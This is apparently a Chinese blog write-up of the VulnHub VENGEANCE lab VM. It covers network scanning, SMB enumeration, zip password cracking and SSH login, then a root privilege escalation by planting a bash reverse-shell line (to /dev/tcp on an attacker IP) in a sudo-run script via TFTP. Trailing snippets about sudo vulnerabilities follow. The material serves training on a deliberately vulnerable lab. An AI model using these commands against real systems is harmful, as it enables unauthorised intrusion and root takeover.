vulnhub之VENGEANCE的实践

VSole2022-06-19 12:06:05

今天实践的是vulnhub的VENGEANCE镜像,

下载地址,https://download.vulnhub.com/digitalworld/VENGEANCE.7z,

用workstation导入成功,先做端口扫描,

sudo netdiscover -r 192.168.137.0/24,

接着进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.82,

发现了不少服务,尤其是有smb服务,还有个22222端口的ssh服务,

对smb服务进行扫描,sudo enum4linux 192.168.137.82,

发现了sara和qinyi两个用户,

连接smb,sudo smbclient -L 192.168.137.82,

发现了sarapublic$目录,连接sarapublic$目录,

sudo smbclient //192.168.137.82/sarapublic$,

发现了不少文件,下载profile.txt和gio.zip,

gio.zip解压要密码,猜测密码在profile.txt里,

kali攻击机上启动一个http下载服务,

python2 -m SimpleHTTPServer 80,

把profile.txt里的字符串采集成字典,

sudo cewl 192.168.137.168/profile.txt -w dict.txt,

破解,sudo fcrackzip -D -p dict.txt -u gio.zip,

用得到的密码解压gio.zip,查看文件,pass_reminder.txt里有个提示,

查看ted_talk.pptx,获取到了密码giovanni_130R_Suzuka,

ssh登录靶机,ssh qinyi@192.168.137.82 -p 22222,

id看一下,不是root,需要进一步提权,

sudo -l看到/home/sara/private/eaurouge是root权限执行的,

但是没有查看和编辑权限,下载pspy64工具进一步获取进程信息,wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64,

执行pspy64发现/home/sara/private目录是tftp服务管理的,

扫描确认,sudo nmap -sU -p69 192.168.137.82,

登录下载eaurouge文件,tftp 192.168.137.82,get eaurouge,

查看eaurouge文件,发现是个bash脚本,

在里面添加反弹shell脚本,bash -c 'exec bash -i &>/dev/tcp/192.168.137.168/8888 <&1',

把文件上传回去,put eaurouge,

kali攻击机上开启nc监听,nc -lvp 8888,

靶机上执行,sudo /home/sara/private/eaurouge,

kali攻击机上获取到shell,id看一下,确认是root。

sudo
本作品采用《CC 协议》,转载必须注明作者和本文链接
Sudo是Linux/Unix系统上常用的工具,管理员可通过它分配给普通用户所需的管理权限,几乎所有的Linux及Unix系统都安装有程序。此基于堆的缓冲区溢出漏洞已隐藏十年之久,利用此漏洞,非特权的本地普通用户可以在主机上获得root特权。相关研究人员已经在Ubuntu 20.04(Sudo 1.8.31)、Debian 10(Sudo 1.8.27)、Fedora 33(Sudo 1.9.2)
sudo 命令只允许使用提升的权限运行单个命令,而 su 命令会启动一个新的 shell,同时允许使用 root 权限运行尽可能多的命令,直到明确退出登录。不过有时间限制,Ubuntu默认为一次时长15分钟。如果后面不加账户时系统默认为root账户,密码也为超级账户的密码。想退回普通账户时可以执行“exit”或“logout” 。要求执行该命令的用户必须在sudoers中才可以。
一名英国安全研究人员今天发现,Sudo应用程序中最近出现的安全漏洞也影响了macOS操作系统,而不仅仅是最初认为的Linux和BSD。Qualys研究人员在上周的 告中表示,他们仅在Ubuntu,Debian和Fedora上测试了该问题。Hickey表示,他测试了CVE-2021-3156漏洞,并发现通过进行一些修改,该安全漏洞也可以用于授予攻击者访问macOS根帐户的权限。苹果在调查报告时拒绝发表评论。
可能你执行了相当多的 sudo 命令,因为你不想一直 sudo su 以 root 身份执行命令。
须安装AFL++,可以使用官方docker镜像;如果已经在本地安装,也可直接使用。测试的场景为,非特权用户输入恶意构造程序执行参数,引起sudo程序崩溃。sudo程序由root用户和其他用户启动的表现是不同的。sudo的所有权是root,但却是由普通用户调用的。argv作为一个指针数组的指针,该指针数组中最后一个指针应为0,其余的每一项为一个字符串指针。注意到afl_init_argv函数中,存在对0x02的判断,编写这个文件的作者解释到,以单独一个0x02作为参数表
据报告,Linux中存在一个高严重性漏洞,低权限攻击者可以利用该漏洞在受影响的系统上获得完整的根访问权限。
环境变量里,如果直接输入?不管用的话,就用绝对路径名的方式:/usr/sbin/useradd?。
之前一直对 su 和 sudo 这两个命令犯迷糊,最近专门搜了这方面的资料,总算是把两者的关系以及用法搞清楚
linux中su与sudo的区别
2021-09-09 09:23:44
首先需要解释下 su 代表什么意思。 之前一直以为 su 是 super user,查阅资料之后才知道原来表示 switch user。 知道 su 是由什么缩写来的之后,那么它提供的功能就显而易见了,就是切换用户。
VSole
网络安全专家